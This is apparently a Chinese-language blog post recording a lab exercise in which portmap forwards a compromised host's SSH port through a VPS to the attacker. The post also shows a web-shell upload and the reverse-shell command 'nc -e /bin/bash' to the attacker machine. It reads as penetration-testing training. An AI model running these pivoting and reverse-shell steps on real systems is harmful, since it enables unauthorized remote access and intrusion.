Portmap 內網端口轉發紀錄

 Portmap 內網端口轉發紀錄


作者 : Noth

前言 : 

上一篇介紹了 Windows 下 Lcx 端口轉發,那 Linux 呢 ?  當然就是靠我們的 portmap 囉 ! xD  在實戰的過程,通常都是把 22 端口給轉發到外網去,在使用 SSH 去連接,接下來我們直接實戰一次就知道啦 !  

內文 : 

實作環境 :

攻擊者 :  192.168.111.130 (Windows 10,內網)

攻擊者 :  35.222.168.245 (VPS,Ubuntu,外網)

受害者 :  192.168.111.128 (Kali,內網)

實作流程:

VPS 執行 portmap,開始監聽 1055 端口,將流量導向 1060 端口

./portmap -m 2 -p1 1055 -h2 35.222.168.245 -p2 1060

kali 執行 portmap,將本地端的 22 port 轉發到公網 vps 1055 端口上

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 35.222.168.245 -p2 1055 

vps 成功監聽,之後將 1055 端口流量導向到 1060 端口


本地端 windows 進行 ssh 連線

ssh kali@35.222.168.245 -p 1060


成功連線 


轉發成功 xD  但實戰當中不只有這種轉發方式,也會遇到一些 SSH 連線問題,例如 「ssh 登入錯誤 ECDSA host key for ip has changed 」 xD  

相關的解決方式 :  https://ithelp.ithome.com.tw/articles/10083004 

只能說遇到問題就想辦法查資料解決 xD  累積解決問題的經驗 !  那如果是在蟻劍的 Terminal 去執行呢 ? 需要透過反彈一個交互式的 Shell 去執行 Pormap !  因為在蟻劍 Terminal 執行 portmap 時大概過了 30s 程式就會斷掉,筆者當時也是很一臉懵逼,後來想想應該是跟 Webserver 有很大的關係 ...  

透過蟻劍上傳 portmap 上傳到 /var/tmp 目錄底下


蟻劍 Terminal 執行 nc 反彈 shell 到本機 windows :  

nc -e /bin/bash 192.168.111.130 443

成功彈回一個交互式的 Shell : 

VPS 執行 portmap 開始監聽 :

 ./portmap -m 2 -p1 1055 -h2 35.222.168.245 -p2 1060

本地端 windows 執行 portmap 將 22 port 轉發到 VPS 上 : 
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 35.222.168.245 -p2 1055

VPS 成功監聽 : 

這時程式不會斷掉,持續執行 portmap : 

本地端 windows 進行 ssh 連線 : 
ssh kali@35.222.168.245 -p 1060

成功連接 :


 



留言

熱門文章